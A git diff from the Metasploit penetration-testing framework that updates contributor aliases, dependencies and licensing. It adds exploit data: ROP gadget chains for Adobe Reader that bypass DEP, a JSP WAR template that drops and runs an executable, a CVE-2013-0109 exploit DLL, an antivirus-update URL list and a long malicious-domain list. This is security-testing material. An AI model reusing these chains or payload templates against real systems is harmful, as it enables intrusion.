diff --git a/.mailmap b/.mailmap index 459d4a064e..713206e261 100644 --- a/.mailmap +++ b/.mailmap @@ -2,6 +2,7 @@ bturner-r7 Brandon Turner dmaloney-r7 David Maloney dmaloney-r7 David Maloney # aka TheLightCosine ecarey-r7 Erran Carey +farias-r7 Fernando Arias hmoore-r7 HD Moore hmoore-r7 HD Moore jlee-r7 egypt # aka egypt @@ -13,14 +14,16 @@ jvazquez-r7 jvazquez-r7 jvazquez-r7 jvazquez-r7 limhoff-r7 Luke Imhoff shuckins-r7 Samuel Huckins -tasos-r7 Tasos Laskos todb-r7 Tod Beardsley todb-r7 Tod Beardsley +todb-r7 Tod Beardsley +trosen-r7 Trevor Rosen wchen-r7 sinn3r # aka sinn3r wchen-r7 sinn3r wchen-r7 Wei Chen wvu-r7 William Vu wvu-r7 William Vu +wvu-r7 William Vu # Above this line are current Rapid7 employees. Below this paragraph are # volunteers, former employees, and potential Rapid7 employees who, at @@ -72,9 +75,18 @@ OJ OJ Reeves OJ OJ r3dy Royce Davis r3dy Royce Davis +Rick Flores <0xnanoquetz9l@gmail.com> Rick Flores (nanotechz9l) <0xnanoquetz9l@gmail.com> rsmudge Raphael Mudge # Aka `butane schierlm Michael Schierl # Aka mihi scriptjunkie Matt Weeks skape Matt Miller spoonm Spoon M swtornio Steve Tornio +Tasos Laskos Tasos Laskos +TrustedSec trustedsec + +# Aliases for utility author names. Since they're fake, typos abound + +Tab Assassin Tabasssassin +Tab Assassin Tabassassin +Tab Assassin TabAssassin diff --git a/Gemfile b/Gemfile index 26b450c436..9dbb6ba2db 100755 --- a/Gemfile +++ b/Gemfile @@ -2,6 +2,8 @@ source 'https://rubygems.org' # Need 3+ for ActiveSupport::Concern gem 'activesupport', '>= 3.0.0' +# Needed for some admin modules (cfme_manageiq_evm_pass_reset.rb) +gem 'bcrypt-ruby' # Needed for some admin modules (scrutinizer_add_user.rb) gem 'json' # Needed by msfgui and other rpc components @@ -17,7 +19,7 @@ group :db do # Needed for Msf::DbManager gem 'activerecord' # Database models shared between framework and Pro. - gem 'metasploit_data_models', '~> 0.16.6' + gem 'metasploit_data_models', '~> 0.16.9' # Needed for module caching in Mdm::ModuleDetails gem 'pg', '>= 0.11' end diff --git a/Gemfile.lock b/Gemfile.lock index d7b1bd88e7..d23d0eb424 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -13,6 +13,7 @@ GEM i18n (~> 0.6, >= 0.6.4) multi_json (~> 1.0) arel (3.0.2) + bcrypt-ruby (3.1.2) builder (3.0.4) database_cleaner (1.1.1) diff-lcs (1.2.4) @@ -21,7 +22,7 @@ GEM fivemat (1.2.1) i18n (0.6.5) json (1.8.0) - metasploit_data_models (0.16.6) + metasploit_data_models (0.16.9) activerecord (>= 3.2.13) activesupport pg @@ -61,11 +62,12 @@ PLATFORMS DEPENDENCIES activerecord activesupport (>= 3.0.0) + bcrypt-ruby database_cleaner factory_girl (>= 4.1.0) fivemat (= 1.2.1) json - metasploit_data_models (~> 0.16.6) + metasploit_data_models (~> 0.16.9) msgpack network_interface (~> 0.0.1) nokogiri diff --git a/LICENSE b/LICENSE index acb2f21eca..8079572def 100644 --- a/LICENSE +++ b/LICENSE @@ -41,93 +41,10 @@ Copyright: 2004-2005 vlad902 2007 H D Moore License: GPL-2 and Artistic -Files: external/source/meterpreter/ReflectiveDLLInjection/* -Copyright: 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com) +Files: external/source/ReflectiveDLLInjection/* +Copyright: 2011, Stephen Fewer of Harmony Security (www.harmonysecurity.com) License: BSD-3-clause -Files: external/source/meterpreter/source/common/queue.h -Copyright: 1991, 1993 The Regents of the University of California -License: BSD-3-clause - -Files: external/source/meterpreter/source/common/zlib/* external/source/meterpreter/source/server/zlib/* -Copyright: 1995-1996 Jean-loup Gailly and Mark Adler -License: Zlib - -Files: external/source/meterpreter/source/bionic/libc/* -Copyright: 2005-2008, The Android Open Source Project - 2004 by Internet Systems Consortium, Inc. ("ISC") - 1995,1996,1999 by Internet Software Consortium - 1995 by International Business Machines, Inc. - 1997,1998,1999,2004 The NetBSD Foundation, Inc. - 1993 Christopher G. Demetriou - 1983,1985,1989,1993 The Regents of the University of California - 2000 Ben Harris - 1995,1996,1997,1998 WIDE Project - 2003 Networks Associates Technology, Inc. - 1993 by Digital Equipment Corporation - 1997 Mark Brinicombe - 1993 Martin Birgmeier - 1993 by Sun Microsystems, Inc. - 1997, 2005 Todd C. Miller - 1995, 1996 Carnegie-Mellon University - 2003 Networks Associates Technology, Inc. -License: BSD-3-clause and BSD-4-clause - -Files: external/source/meterpreter/source/bionic/libdl/* -Copyright: 2007 The Android Open Source Project -License: BSD-3-clause - -Files: external/source/meterpreter/source/bionic/libm/* -Copyright: 2003, Steven G. Kargl - 2003 Mike Barcroft - 2002-2005 David Schultz - 2004 Stefan Farfeleder - 2003 Dag-Erling Coïdan Smørgrav - 1996 The NetBSD Foundation, Inc. - 1985,1988,1991,1992,1993 The Regents of the University of California - 1993,94 Winning Strategies, Inc. - 1993, 2004 by Sun Microsystems, Inc. -License: BSD-2-clause and BSD-3-clause and BSD-4-clause - -Files: external/source/meterpreter/source/extensions/espia/screen.c -Copyright: 1994-2008, Mark Hammond -License: BSD-2-clause - -Files: external/source/meterpreter/source/extensions/priv/server/timestomp.c -Copyright: 2005 Vincent Liu -License: GPL-2 - -Files: external/source/meterpreter/source/extensions/stdapi/server/webcam/bmp2jpeg.c external/source/meterpreter/source/screenshot/bmp2jpeg.c -Copyright: 1994-2008, Mark Hammond -License: BSD-2-clause - -Files: external/source/meterpreter/source/extensions/stdapi/server/railgun/railgun.c -Copyright: 2010, patrickHVE@googlemail.com -License: BSD-2-clause - -Files: external/source/meterpreter/source/pssdk/* -Copyright: microOLAP -License: N/A -Comment: HD Moore holds a single-seat developer license for the Packet Sniffer - SDK library embedded into the Meterpreter Sniffer extension. This - source code is not distributed with Metasploit Framework. - -Files: external/source/meterpreter/source/openssl/* -Copyright: 1998-2002 The OpenSSL Project -License: OpenSSL and SSLeay - -Files: external/source/meterpreter/source/server/posix/sfsyscall.h -Copyright: 2003 Philippe Biondi -License: LGPL - -Files: external/source/meterpreter/source/jpeg-8/* -Copyright: 1991-2010, Thomas G. Lane, Guido Vollbeding -License: BSD-3-clause - -Files: external/source/meterpreter/source/libpcap/* -Copyright: 1990, 1991, 1992, 1993, 1994, 1995, 1996, 1997 The Regents of the University of California. -License: BSD-4-clause - Files: external/source/metsvc/* Copyright: 2007, Determina Inc. License: BSD-3-clause diff --git a/data/exploits/CVE-2013-0109/nvidia_nvsvc.x86.dll b/data/exploits/CVE-2013-0109/nvidia_nvsvc.x86.dll new file mode 100755 index 0000000000..c5de3905b5 Binary files /dev/null and b/data/exploits/CVE-2013-0109/nvidia_nvsvc.x86.dll differ diff --git a/data/ropdb/reader.xml b/data/ropdb/reader.xml new file mode 100644 index 0000000000..2e4c6bd4ea --- /dev/null +++ b/data/ropdb/reader.xml @@ -0,0 +1,132 @@ + + + + + + 9 + + + + pop ecx # ret + push eax # pop esp # ret + pop eax # ret + ptr to CreateFileMappingA() + call [eax] # ret + HANDLE hFile + LPSECURITY_ATTRIBUTES lpAttributes + DWORD flProtect + DWORD dwMaximumSizeHigh + DWORD dwMaximumSizeHigh + LPCTSTR lpName + pop edi # ret + pop ebp # pop ebx # pop ecx # ret + pop ebx # ret + pop eax # ret + pop ecx # ret + ptr to MapViewOfFile() + mov edx, ecx + pop ecx # ret + call [eax] # ret + pushad # add al, 0 # ret + DWORD dwDesiredAccess + DWORD dwFileOffsetHigh + DWORD dwFileOffsetLow + SIZE_T dwNumberOfBytesToMap + pop edi # pop esi # pop ebp # pop ebx # pop ecx # ret + jmp IAT msvcr80!memcpy + ret + JUNK + memcpy length + JUNK + xchg eax, ebp # ret + pushad # add al, 0 # ret + + + + + + 10 + + + + pop ecx # ret + push eax # pop esp # ret + pop eax # ret + ptr to CreateFileMappingA() + call [eax] # ret + HANDLE hFile + LPSECURITY_ATTRIBUTES lpAttributes + DWORD flProtect + DWORD dwMaximumSizeHigh + DWORD dwMaximumSizeHigh + LPCTSTR lpName + pop edi # ret + pop ebp # pop ebx # pop ecx # ret + pop ebx # ret + pop eax # ret + pop ecx # ret + ptr to MapViewOfFile() + mov edx, ecx + pop ecx # ret + call [eax] # ret + pushad # add al, 0 # ret + DWORD dwDesiredAccess + DWORD dwFileOffsetHigh + DWORD dwFileOffsetLow + SIZE_T dwNumberOfBytesToMap + pop edi # pop esi # pop ebp # pop ebx # pop ecx # ret + jmp to IAT msvcr90!memcpy + ret + JUNK + memcpy length + JUNK + xchg eax, ebp # ret + pushad # add al, 0 # ret + + + + + + 11 + + + + pop ecx # ret + push eax # pop esp # ret + pop eax # ret + ptr to CreateFileMappingA() + call [eax] # ret + HANDLE hFile + LPSECURITY_ATTRIBUTES lpAttributes + DWORD flProtect + DWORD dwMaximumSizeHigh + DWORD dwMaximumSizeHigh + LPCTSTR lpName + pop edi # ret + JUNK + pop ebx # pop esi # pop ebp # ret + pop eax # ret + pop esi # pop ebp # ret + JUNK + pop ecx # ret + call [eax] # ret + pop edx # ret + ptr to MapViewOfFile() + pushad # add al, 0 # pop ebp # ret + DWORD dwDesiredAccess + DWORD dwFileOffsetHigh + DWORD dwFileOffsetLow + SIZE_T dwNumberOfBytesToMap + pop edi # pop esi # pop ebp # ret + memcpy address + call eax # ret + memcpy address + xchg eax, ebp # ret + pop ebx # ret + memcpy length + pop edx # ret + pop edx # ret + pushad # add al, 0 # pop ebp # ret + + + \ No newline at end of file diff --git a/data/templates/scripts/to_exe_jsp.war.template b/data/templates/scripts/to_exe_jsp.war.template index 3797d576c1..43fc99d8ea 100644 --- a/data/templates/scripts/to_exe_jsp.war.template +++ b/data/templates/scripts/to_exe_jsp.war.template @@ -39,11 +39,13 @@ if (%{var_proc}.waitFor() == 0) { %{var_proc} = Runtime.getRuntime().exec(%{var_exepath}); } - + File %{var_fdel} = new File(%{var_exepath}); %{var_fdel}.delete(); - } - else + } + else { - Process %{var_proc} = Runtime.getRuntime().exec(%{var_exepath}); + String[] %{var_exepatharray} = new String[1]; + %{var_exepatharray}[0] = %{var_exepath}; + Process %{var_proc} = Runtime.getRuntime().exec(%{var_exepatharray}); } %%> diff --git a/data/vncdll.dll b/data/vncdll.dll deleted file mode 100755 index f0bd4da8a5..0000000000 Binary files a/data/vncdll.dll and /dev/null differ diff --git a/data/vncdll.x64.dll b/data/vncdll.x64.dll index c8d1ff48d8..6922fb2511 100755 Binary files a/data/vncdll.x64.dll and b/data/vncdll.x64.dll differ diff --git a/data/vncdll.x86.dll b/data/vncdll.x86.dll new file mode 100755 index 0000000000..4dd5b516cd Binary files /dev/null and b/data/vncdll.x86.dll differ diff --git a/data/wordlists/av-update-urls.txt b/data/wordlists/av-update-urls.txt new file mode 100644 index 0000000000..39e85cfa08 --- /dev/null +++ b/data/wordlists/av-update-urls.txt @@ -0,0 +1,28 @@ +www.es-web.sophos.com +www.es-web.sophos.com.edgesuite.net +www.es-web-2.sophos.com +www.es-web-2.sophos.com.edgesuite.net +www.dnl-01.geo.kaspersky.com +www.downloads2.kaspersky-labs.com +www.liveupdate.symantecliveupdate.com +www.liveupdate.symantec.com +www.update.symantec.com +www.update.nai.com +www.download797.avast.com +www.guru.avg.com +www.osce8-p.activeupdate.trendmicro.com +www.forefrontdl.microsoft.com +es-web.sophos.com +es-web.sophos.com.edgesuite.net +es-web-2.sophos.com +es-web-2.sophos.com.edgesuite.net +dnl-01.geo.kaspersky.com +downloads2.kaspersky-labs.com +liveupdate.symantecliveupdate.com +liveupdate.symantec.com +update.symantec.com +update.nai.com +download797.avast.com +guru.avg.com +osce8-p.activeupdate.trendmicro.com +forefrontdl.microsoft.com diff --git a/data/wordlists/malicious_urls.txt b/data/wordlists/malicious_urls.txt new file mode 100644 index 0000000000..0b0acc439c --- /dev/null +++ b/data/wordlists/malicious_urls.txt @@ -0,0 +1,3968 @@ +00398d0.netsolhost.com +0414qd.com +0577rc.net +0koryu0.easter.ne.jp +0zz0.com +1-vinstaller.com +1.michaelwilsonmusic.com +100megabyte.com +11.lamarianella.info +12318wh.com +123mediaplayer.com +123mplayer.com +125search.com +127.co.kr +12danji.com +1322.com +1364ih5d6.ni.net.tr +137158.cn +1860php.com +197.242.148.159-static.reverse.softlayer.com +199.193.232.43-static.reverse.softlayer.com +19tenco.com +1clickmoviedownloader.info +1k.pl +1miem.org +1wstdfgh.organiccrap.com +2.refiinc.com +2.wholesalepbm.com +2.zerocostfha.com +2007scapebot.net +200mail.com +2010103.com +212.124.115.216-static.reverse.softlayer.com +21tx.com +2345.cn +249.strangled.net +24sky.co.kr +24ut1.ru +26923.com +28ytls60.ni.net.tr +2wnpf.tld.cc +3.bluepointmortgage.com +3.coolerpillow.com +3.photowallrental.com +321vn.sites.uol.com.br +3322.org +360edu.com +360tpcdn.com +365idc.com +3apa3a.tomsk.tw +3dmodelagem.com +3dvideodownload.com +3herculeans.com +3kinds.net +3lsoft.com +3rbw.com +3rddownload.com +3shitou.com +3x.ro +4.androidislamic.com +4.collecorvino.org +4.dlevo.com +4.e-why.net +4.luca-volonte.org +4.newenergydata.biz +4.newenergydata.info +4.periziavela.com +4.pianetapollo.com +4.whereinitaly.com +4.whereinlazio.com +4.whereinliguria.com +4.whereinlombardy.com +4.whereinmilan.com +4.whereinmolise.com +4.whereinpiemonte.com +4.whereinpuglia.com +4.whereinsardegna.com +4.whereinsicilia.com +4.whereinsicily.com +4.whereintoscana.com +4.whereintrentinoaltoadige.com +49mp3.com +4k5.com +4kids2kids.net +4office.com +4sinstalls.info +4yourcsecret.co.tv +5.attilacrm.com +5.chinottoneri.com +5.estasiatica.com +5.eventiduepuntozero.com +50eee9e483691.daveandterra.com +50efa6486f1ef.skydivesolutions.be +50webs.com +510799b627b3d.bidbandit.co.uk +5107a120d92e0.e-chore.co.uk +5108134940e79.wheelchairsforindia.com +512.ir +51web8.net +52z.com +55555.to +58toto.com.cn +6.bbnface.com +6.bbnfaces.net +6.bbnsmsgateway.com +6.grapafood.com +6.mamaswishes.com +6.negutterking.org +614.hol.es +63.net +69-64-92-87.dedicated.abac.net +705forum.com +70mmcinema.net +798kan.com +7file.co.kr +800cdn.com +8095.net +866dy.com +866rfgroup.com +878help.com +87yd.com +888casino-luckystar.net +8index.com +8mm.hiho.jp +9.bohmamei.com +9.hclinstitute.com +9.i-am-a-pussy.com +9.m2humannexus.com +91.com +91wan.com +9yuonline.com +a.update.51edm.net +aa0987.com +aaedeusa.rubbermarbles.com +aangedraafdhypothecated.beautysupplytraining.com +ab-tools.com +ab18toys.mobi +abel_guimaraes.sites.uol.com.br +abelarddo.com +abgycwu.net +abk.premeditation.asia +about-home-security.com +aboutfacetheatre.com +acapellakan.pupu.jp +accgame.com +accu.rhetoricalpoems.asia +accuratedownload.com +achren.org +aconfideeeeeracia200.com +actes-lyon.org +actionpreventive.com +activeadultproperties.com +actsforcharged.com +ad-spider.com +ad.inewsweek.cn +adahb.org +adaptec.com +adcdls.com +addendam.co.kr +addictnetwork.net +addoncommon.info +addonspotbox.info +adebola.grandshost.com +adgallery.whitehousedrugpolicy.gov +adilsondocavacoaulasvianet.com +adlice.com +adlrma.com +admarcontabil.sites.uol.com.br +admincareers.com +adminroomsoftware.com +adobe-flashplayer.com +adobe-plugin.tk +adobeinfo.org +adrianobenigno.com.br +adsea.net +adserving.favorit-network.com +adv-tecsystems.net +advancedregistryclear.com +advantig.com +advombat.ru +advsys.net +advwinntdigiplus.net +adware-2009.com +ae-21-70.car1.losangeles1.level-3.us +ae-21-70.car1.newyork1.levei-3.net +ae-63-26.cbr2.losangeles1.edge02.net +aeiegypt.com +aerolito.com.br +afa15.com.ne.kr +affinity.modeldns.com.au +afreecodec.com +agame.ca +agassy.net +agility-ml.com +agostinhoaugusto.sites.uol.com.br +agrar24.at +agriculturetoday.in +agriexpo.in +ahrens-kind.de +ahsapamerikankapi.com +aigotek.com +airdream.ru +airedaleterrier.cz +airknorflystart.ai.funpic.de +ajguazzelli.sites.uol.com.br +ak-rallyteam.home.pl +akce.ambergold.cz +akebono.under.jp +aksteachingsolution.com +akweng.com +alabaka.net +alaluzdelabiblia.org +alanjsaffron.com +alarmsoft.com +ale.goncal.sites.uol.com.br +algumfamiliareveion2010.xpg.com.br +alipay.com +alissonluis-musico.sites.uol.com.br +alizafashion.com +alkarmel.com.jo +allalla.com +allegro.gmb.pl +allenskitchenandbath.com +allfiles100.com +allfiles107.com +allfiles108.com +allfiles109.com +allfiles110.com +allfiles118.com +allfortune777.biz +alliedcarrentals.com +alllinuxapplicationsy.asia +allmapsoft.com +allmyfiles102.com +allmyfiles115.com +allmyfiles118.com +allmyfiles15.com +allpopup.com +allthegate.com +allvideo.org.uk +allwebjobs.com +allxscan.tk +alotibi.panadool400.com +alotimg.com +alschsa.com +alseeonline.co.kr +alternativateam.cz +altervista.org +alyac.co.kr +ambergold.cz +amicitreni.org +amods.net +amoninst.com +amonisto.com +ampala.net +ampfuschini.sites.uol.com.br +amsterbtn.vv.cc +amu.adduraddonhere.info +amu.boxinstallercompany.info +amu.brandnewinstall.info +amu.helpyourselfinstall.info +amu.twobox4addon.info +an-inconvenient-truth.com +anaf.com.br +analxxxclipsyjh.dnset.com +anappz.com +ancamera.co.kr +andrea_antonacci.sites.uol.com.br +androidonlines.com +andysgame.com +aniani.info +animatedchristmasscreensavers.com +anketguidevemersion.com +anonymizercom.com +antalya.ru +antfraud.co.cc +antoine-lapeyre.com +anwaltskanzlei-drischmann.de +anydaycomstwe.net +anysecu.net +ao1004.com +aonicgamers.net +aoom.com.au +aparecida.tiburcio.sites.uol.com.br +apcig.org +apfelfeed.de +app.mkspace.biz +appcentric103.com +appet.ru +applicationscenterforally.asia +applicationscreditforally.asia +applicationsforallsitey.asia +applicationsgroupforally.asia +appline.ieguide.co.kr +appzspotdown.info +aq8.cc +aquageo.cl +aquavpn.com +aqvasex.tk +arabpetroleum.net +aralgood.com +araujofernao.sites.uol.com.br +arcodep.com +arestidessilva.sites.uol.com.br +arnondemello.com.br +arriowzzetobe.net +arrudam.zeca.sites.uol.com.br +arsinco.com.br +arta.romail3arnest.info +artemisaalves.sites.uol.com.br +artick.wen.ru +artisanwonder.com +artvideo3d.ru +asanixcorp.com +asassis.sites.uol.com.br +asearch.co.kr +asfitness.com +asformations.fr +ashtartours.com +ask.com +askadresi.net +askmeaboutcctv.com +asoftwareplus.com +asoftwareupdate.com +asoftwarez.com +asp.spinchats.com +aspenhonda.com +assarbad.net +assesi.com +asso69110.org +associatesexports.com +astaloscojonesbck.net.in +astexisnew.net +at-tech.co.il +atappz.com +atdheapp.com +atdhenetapptv.com +atdhenettvapp.com +atelier3a.fr +athena.vistapages.com +atishoobeauty.com +atlog.com.sg +atolye4.com +audio4fun.com +audiochannel.net +aumimo.sites.uol.com.br +aurummulier.pl +auto-free.com +autodopravaskoda.cz +autohideip.com +autoitscript.com +autokd.cz +automatedaffiliatemachine.com +automsn.hotmail.ru +avanquest.com +avatar.xaa.pl +avirasecureserver.com +avsm.ws +aworldbd.com +axis.my +ayrtravellersmotel.com.au +aysport.net +azurial.net +b3enzcanadaa.com +b6canadas4atea.com +babblepulse.com +babos.scrapping.cc +bacguarp.com +backupworld.biz +baddosky.nazuka.net +badgefortime.net +badgewinners.com +badgewinners.net +baduqq.com +baidu.co.th +baidu.com +bananamamor.ru +bandofbros.us +banks.co.il +banner.eurogrand.com +bapujds.thehavazoo.com +barackobamainfo.com +barakair2.com +bargainracks.co.uk +barzev.net +basitbellitalianart.eu +batangicon.net +bauerpetr.cz +bb1.sandco.org +bbb-accredited.net +bbc-world-news.co.uk +bbce-legalconsultancy.com +bbcnews-money.net +bbdignite.com +bbe.rauzqivu.ru +bbs.6858dz.com +bbs.bjchun.com +bbwscimanuk.pdsda.net +bcozindia.com +bde.be +be-funk.com +beachfiretald.com +beautifulbritain.co.uk +beckandpartners.com +begin.pro +beilequ.com +beingpcky.com +beisentse.net +beldiplomcom.75.com1.ru +bellefonte.net +bellwetherlabradors.com +belnialamsik.ru +bemarcondes.sites.uol.com.br +benini.xpg.com.br +benzavenue.com +berezutskii.narod.ru +beromder56.com +berrybots.net +best-new-zip-my.info +best-trololo.com +bestcodecpackapp.com +bestemoticon.com +bestfilesdatak.asia +bestfilesdatay.asia +bestnewzipmy.info +bestshareware.net +bestvaccine.co.kr +betivervega.com +betterinstaller.com +bezproudoff.cz +bff.7oorq8.com +bff4.7oorq8.com +bgdir.org +bggranite.ca +bh-china.cn +bh.popredirect.com +bhagidari.net +bharattruck.com +biancabgm.sites.uol.com.br +bibleversepuzzles.com +bidexbank.ohost.de +big-dadd.com +bigdogtoner.com +bigel.ru +bigfile.co.kr +bigfile.or.kr +bigmama.fr +bigs-shop.com +bikebilgisayar.com +bilico.sites.uol.com.br +bill.4java.ca +billing.hostwaves.com +bingb.5webs.net +binsetup.com +biokovoholidays.com +biotic.ro +birchcompany.in +bisrv.com +bitchat.org +bizall.co.jp +biznessmanonline.bi.funpic.de +bizserviceszero.com +bizzibeans.net +bj04.com +blackengineering.co.uk +blacknite.eu +blackroot.pro +bleee.eu +blessedbiz.bl.funpic.de +blessingworld.co.in +blessmyhustles.com +blog.jekotia.net +blue-cardinal.com +bluecutsystem.com +blueone.net +blztotal.sites.uol.com.br +bmalkids.eu +bmwfanatics.eu +boanscan.co.kr +boansite.co.kr +boansolution.co.kr +boansystem.co.kr +boanupdate.co.kr +boanweb.co.kr +bobkilasadareta.su +bokkinfh.php5.cz +bonata.pl +bookingsessential.com +bookofkisl.com +bookr24.ru +bootstrap-js.net +bora369.com +botmasterlabs.net +botoxpatient.com +bouncer.bot.nu +boykusumabrata.com +bp.olofyj.ru +bplaced.com +brainblock.com +brasstradingpty.com +bravetools.net +brianhenshaw.topcities.com +bride1.com +brightchoicelighting.com +britishracingsystems.com +broodmother.com +brop.be +bropbrap.be +brospecial.net +brothersoft.com +buffalogoesout.com +buffingtonlaw.com +bufflomens.me.uk +bufur.cz +buldir.com +bulletproof-web.com +bundesregeirung.de +bundledmonkey.com +bunker.org.ua +bunyabilla.com +burgermannnn7719.biz +buruntuyr.com +buttonguide.co.kr +buyfrome.bu.funpic.de +buyinfo-centreq.tk +buyinfo-centreqcv.tk +buypaymer.so +buyphrobi.com +by98.com +bytessence.com +c-71-63-136-200.hsd1.mn.comcast.net +c15.bkla.pw +c5.zhga.biz +cabanasdopontal.com.br +cacajose.sites.uol.com.br +cacl.in +caderix.com +cafe24.com +cairujp.sites.uol.com.br +cakircali.net +calleite.sites.uol.com.br +callingcardsinstantly.com +calmonstarn.co.uk +cam49.fr +cameraweb-cartoon.tk +camposdelapampa.com.ar +camsapoolt2.biz +canadagames.theunsignedsounds.com +canichesycia.com.ar +cannabisbeer.com +cannabislyric.com +cannabispicture.com +cannabisrecipe.com +cannabisvaporizer.com +cannabisvodka.com +canoede.info +canyonshadowlabs.com +capfile.co.kr +capitalcurbing.com +capodeicapi.eu +card.org.in +carebathe.com +carepc.co.kr +carlosfalavina.sites.uol.com.br +carlosvieira1960.sites.uol.com.br +carol.omoura.sites.uol.com.br +cartethont.com +casateixeira.sites.uol.com.br +cashcasinoworld.com +cashmandevelopment.com +cashupnew.com +casinorewards.com +castleempire.com +casualcare.net +catalactica.org.ro +cathyandjeff.com +catocife.sites.uol.com.br +catrootsz.com +catsshow2online.info +cavitelife.com +cceinfo.com.br +ccgp.gov.cn +ccgslb.net +cctae.com +cdfrj.com +cdfurniture.com.my +cdn-services.com +cdn77.net +cdndp.com +celgmed.com.br +celikleraksesuar.com +centerline.co.kr +cerec.ru +certkey.or.kr +ceskarepublika.net +ceskyjiretin.cz +cetac.sites.uol.com.br +cgermanoferreira.sites.uol.com.br +cgito.net +chachating.com +champlus.co.kr +chanywa.com +charteredcapitalbk.com +checknews.5webs.net +checkspeed.co.kr +cherie-boheme.com +cheriosmarketing.net +cherrybombpetition.org +cherryfun.com +chesterfield.net.in +chinabuznessmen.ch.funpic.de +chinadatasoft.com +chinahourse.ch.funpic.de +chinakofo.com +chol.com +cholifo.info +chonbuk.ac.kr +chris-pc.com +christmasgiftforkids.com +chrome-update.org +ciistudies.com +cimrman.org +cincyty.com +cinerak.com +ciscoc.ru +cistus.cz +citus.co.kr +civicfootprint.net +civilserve.com +classificadosgazeta.com.br +claudia.reinaldo.sites.uol.com.br +claudiomaia1969.sites.uol.com.br +cleanwaters.sites.uol.com.br +clickmon.co.kr +clickrate.com.au +clickvaccine.co.kr +client.parallelgeo.com +clientfiles23.pw +clinicvaccine.co.kr +closedir.com +cloudapp.net +cloudfile11.com +cloudfront.net +cloudsvr12.com +cloudsvr206.com +cloudsvr22.com +cloudsvr30.com +cloudsvr305.com +cloudsvr31.com +cloudsvr32.com +cloudsvr40.com +cloudsvr41.com +cloudsvr46.com +cloudsvr518.com +clping.com +cmbpupin.sites.uol.com.br +cmdi.gov.cn +cms1500assistant.com +cndbase.ru +cntajomar.es +cofeb13east.com +cog.hellofuck.co.vu +colossusmetin2.eu +com.ne.kr +com41miss.rr.nu +comercialdr.sites.uol.com.br +coming1.007webs.com +coming2.007webs.com +coming3.007webs.com +coming4.007webs.com +coming5.007webs.com +companionposes.net +compass-company.ru +compfixer.net +compforallnew.info +complainpaywall.net +compstorage.info +computo164.laweb.es +condinstalls.biz +conds.ru +conduit-download.com +conduit-services.com +conduit.com +config.shopperreports.com +congrbasering.su +conqueronline-co.91.com.tqpoint.com +consumerfocusedconspicuously.net +consumersshow.net +cont24x7host.org +contatoseguranca.hol.es +contexrender.com.au +controlpc.co.kr +convert-videos.net +cookingwithmarijuana.com +cool-screensavers.com +coolbmw.ru +coolestmovie.info +coolfreestudio.com +coolwaremax.com +costcopainlessly.org +count.fuckunion.com +counter-1.adscounter.com.ua +cowon.com +cpablue.com +cpiresmartins.sites.uol.com.br +cplrenovationsinc.com +cpudln.com +cr173.com +cracks.vg +crackspider.us +crackzone.net +creamlonsarter.co.uk +createlognet.co.uk +creativeimagephotographics.com +credocatholic.com +critical-update-server1.com +crogsz.sites.uol.com.br +crossgl.com +crossrider.com +crossunltd.npage.de +crowncraftsinc.com +crowniih.com +crownike2010-uol.sites.uol.com.br +crx-web.com +crystalgraphics.com +cs-copez.com +csaaac.com +cskrf.com +csoakley.com +csson.qc.cx +cswilliamsburg.com +cubetree.co.kr +cumfaci.eu +customer.appmys-ups.com +customer.appmys-ups.org +customers.invoice-appmy.org +customgraphicproducts.com +customsboysint.com +customyarns.com +cwgministries.org +cwmgaming.com +cwvmtudybwvr.myfw.us +cyber-ta.org +cyberlandia.org +cygnus.inc.cl +cyuqtaz.com +cznshuya.ivnet.ru +czout.wuwykym.net +d-h.st +d0wnohqimjjedf0jq.net +d0wnpzivrubajjui.com +d3moncorp.co.uk +dabtune4.eu +dada.hanztrading.com +dadajozo.sk +dadrbacau.ro +dafapunter.com +dajizzum.com +damagalko.ru +danckert.dk +dangcem.com +dape.net +dargs.su +darkboard.net +darker.in.ua +dashuxmaecrme.com +dashuxmaecrmecia.ws +data.sfvolleyball.net +datarecoveryoxfordshire.co.uk +dattinggate.com +daum.net +davebarry.net +davedownloads.info +dawnframing.com +day27.007webs.com +day27s.5webs.net +day27x.5webs.net +dazzlefly.ru +dbgo.com +dcanscapital.co.uk +ddcsa.co.za +dddq.net +ddooo.com +deal-spy.com +deanwallaceplumbing.com.au +debitor.su +deborenttt.co.uk +decoderactive.com +deep-shadows.com +defencevaccine.co.kr +delavilla.com.ar +deletespyware-adware.com +deltaboatraces.net +deltariverhouse.net +demandmeticul.net +demoralization.ru +dentalsg.sites.uol.com.br +dentbeen.eu +denturesolutionsmaine.com +depaulamdp.sites.uol.com.br +depistage-precoce-vih.com +derjismutik.info +dertoprteiopolo.com +des84.com +desbloquear-celular.com.ar +descubretuser.com +deskthemepacks.com +desportonalinha.com +destino-crew.com +detadomain.su +dettymoodz.com +devpia.com +dewell.ru +dfudont.ru +dhofarinsurance.com +diablo3keygen.net +diamondjewelry1.com +diaoyudao56.com +diaryofagameaddict.com +digiaquascr.com +digitalriver.com +dikolas.homedns.org +dimenal.com.br +diminisheddatatransfer.net +dimsnetwork.com +dinamicotelemercadeo.com +dineromode.dvrdns.org +dino1.hc0.me +dinoraheventos.com.br +dion.ne.jp +diosdelared.com.mx +dir-swin-8-writesb.net +direct-downloader.com +directdownloader2.com +directxex.com +dirtyhomemade.com +dirvers.net +disownon.ru +dispatchingsolutions.com +diyhard.co.kr +djekichankoy.com +djstripe.com +dl-library.com +dl.heima8.com +dl01.faddmr.com +dlkqwpjnpj.times.lv +dll-dll.com +dllsuite.info +dlmgg.com +dls.nicdls.com +dlvit.com +dmssmgf.ru +dns-vip.net +dnsaddress.co.kr +do1788.com +doctordavet.com +documentsguidey.asia +doemguing.net +doliv777.com +domainbg.com +domains.publicspanking.com.ar +domainslusiannastyle.info +dominionthe.com +domophone.kiev.ua +donaldsimmelweb.com +dongtaiwang.com +dongyangmotors.co.kr +donkeyplus.com +doorstansen.com +doorwindowsen.net +doosoun.co.kr +dos.wearethenest.com.au +dosup.com +dotdo.net +dothome.co.kr +dotworldgroup.com +dowaplus.biz +down.52hxw.com +down4load.com +downb468.com +downc468.com +downd468.com +downe468.com +downf468.com +downg468.com +downhelper.co.kr +downholic.com +download-center.info +download-instantly.com +download-pc.com +download-servers.com +download-star.org +download-tuxpaint.com +download-url.com +download.jj.cn +download.net.pl +download.sbg.se +download2.pro.de +download2013.net +download207.mediafire.com +download2desktop.com +download4you.info +downloadadmin.com +downloadastro.com +downloaden-kostenlos.com +downloadmesiesaniegu.com +downloadnow2.com +downloadserver15.com +downloadserver23.net 